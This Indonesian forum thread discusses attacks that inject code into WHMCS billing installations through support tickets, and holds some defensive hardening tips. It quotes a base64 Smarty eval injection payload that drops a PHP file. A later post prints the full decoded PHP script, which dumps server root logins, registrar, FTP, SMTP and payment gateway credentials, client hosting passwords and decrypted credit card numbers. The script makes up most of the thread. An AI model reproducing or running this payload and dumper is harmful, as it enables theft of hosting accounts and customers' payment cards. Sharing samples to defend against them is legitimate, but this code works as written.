Injeksi lewat SUPPORT TICKET WHMCS


Status
Not open for further replies.
premium said:
ini kode nya

Code: 
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNj.....4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
Click to expand...

lha ini kan kayak kode yg ada di awal trit ini bro, kepada CG mohon diedit juga kode ini supaya gak dikopi-paste siapa saja yang ingin berbuat iseng ke whmcs siapapun :(

btw gimana ente bisa tau kalo penyusupan ini berhasil membuat user baru bro? sekedar user di whmcs atau bisa create account cpanel?
 
budiono said:
lha ini kan kayak kode yg ada di awal trit ini bro, kepada CG mohon diedit juga kode ini supaya gak dikopi-paste siapa saja yang ingin berbuat iseng ke whmcs siapapun :(

btw gimana ente bisa tau kalo penyusupan ini berhasil membuat user baru bro? sekedar user di whmcs atau bisa create account cpanel?
Click to expand...

sy tau krn krn user tsb terdeteksi mengirim tiket support jg, nampak dari klien id(Di klik utk melihat dia ambil paket apa, kan nampak jg toh, dia ngirim tiket support)

ini picnya (dia berhasil buat akun di whmcs nya saja bukan WHM/CPANEL)

2dh9x7p.jpg
 
kalau mau bikin username baru di whmcs bukanya tidak perlu kegiatan injeksi? semua orang pasti bisa register, tetapi kalau berhasil membuat user cPanel baru nah itu mungkin target utama. saya kira scripts tersebut masih sama yaitu untuk mengambil user name password untuk database sql
 
demi keamanan tambahan sebaiknya ganti nama folder admin dan pasang SSL ..
setidaknya buat login hackernya harus nebak2 dulu nama folder adminnya untuk login
 
felz said:
kalau mau bikin username baru di whmcs bukanya tidak perlu kegiatan injeksi? semua orang pasti bisa register, tetapi kalau berhasil membuat user cPanel baru nah itu mungkin target utama. saya kira scripts tersebut masih sama yaitu untuk mengambil user name password untuk database sql
Click to expand...
mmg betul sih .. klo mau buat akun diwhmcs bs lnsg ... tp sptnya org ini buat akun whmcs tanpa masuk dan ketok pintu depan deh
 
saya pribadi sih selama ini saya lakukan :
1. whmcs di install di server terpisah dari server-server buat klien
2. password protect via .htaccess di folder admin
2. implementasi security standar whmcs
3. upload file php seperti yang di sini
4. support ticket saya pisahkan dari whmcs yang pertama dan diinstall di server lain. whmcs yang pertama khusus klien area buat manage product dan yang ini khusus ticket aja.
 
Malam ini masih aja ada yang berupaya teknik ini. Mencoba trial dan error :D
Hasil Encode:

include('configuration.php');

$query = mysql_query("SELECT * FROM tblservers");
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];


$password = decrypt ($v['password'], $cc_encryption_hash);

$text=$text."Type $type\r\n";
$text=$text."Active $active\r\n";
$text=$text."Hostname $hostname\r\n";
$text=$text."Ip $ipaddress\r\n";
$text=$text."Username $username\r\n";
$text=$text."Password $password\r\n**************************************\r\n";


}
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";

$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$query = mysql_query("SELECT * FROM tblregistrars");

while($v = mysql_fetch_array($query)) {

$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
$text=$text."$registrar $setting $value\r\n";
}
$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
$query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort'");
while($v = mysql_fetch_array($query)) {
$value =$v['value'];
if ($value=="") {
$value=0;
}

$text=$text.$v['setting']." ".$value."\r\n" ;

}


$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";

$text=$text."\r\n######################### Payment gateway ###########################\r\n";
$query = mysql_query("SELECT * FROM tblpaymentgateways");
while($v = mysql_fetch_array($query)) {

$gateway = $v['gateway'];
$setting = $v['setting'];
$value = $v['value'];

$text=$text."$gateway|$setting|$value\r\n";


}
$text=$text."\r\n######################### Payment gateway ###########################\r\n";

$text=$text."\r\n######################### Client R00ts ###########################\r\n";
$query = mysql_query("SELECT * FROM tblhosting where (username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator') and domainstatus='Active'");


while($v = mysql_fetch_array($query)) {
$text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
}
$text=$text."\r\n######################### Client R00ts ###########################\r\n";

$text=$text."\r\n######################### Client HOST ###########################\r\n";
$query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");


while($v = mysql_fetch_array($query)) {
if (($v['username'] ) and ($v['password'])) {
$text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
}
}
$text=$text."\r\n######################### Client HOST ###########################\r\n";


$text=$text."\r\n######################### Client CC ###########################\r\n";
$query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc");


while($v = mysql_fetch_array($query)) {
$cchash = md5( $cc_encryption_hash.$v['0']);
$s= mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate,country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" );

$country = $v['country'];
$email = $v['email'];

$firstname = $v['firstname'];
$lastname = $v['lastname'];
$address1 = $v['address1'];
$city = $v['city'];
$state = $v['state'];
$postcode = $v['postcode'];
$phonenumber = $v['phonenumber'];

$v2=mysql_fetch_array($s);

$text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4]." $firstname $lastname ~ $address1:$city:$state:$postcode:$phonenumber $country $email\r\n";
}




$text=$text."\r\n######################### Client CC ###########################\r\n";

echo($text);
 
Status
Not open for further replies.
Back
Top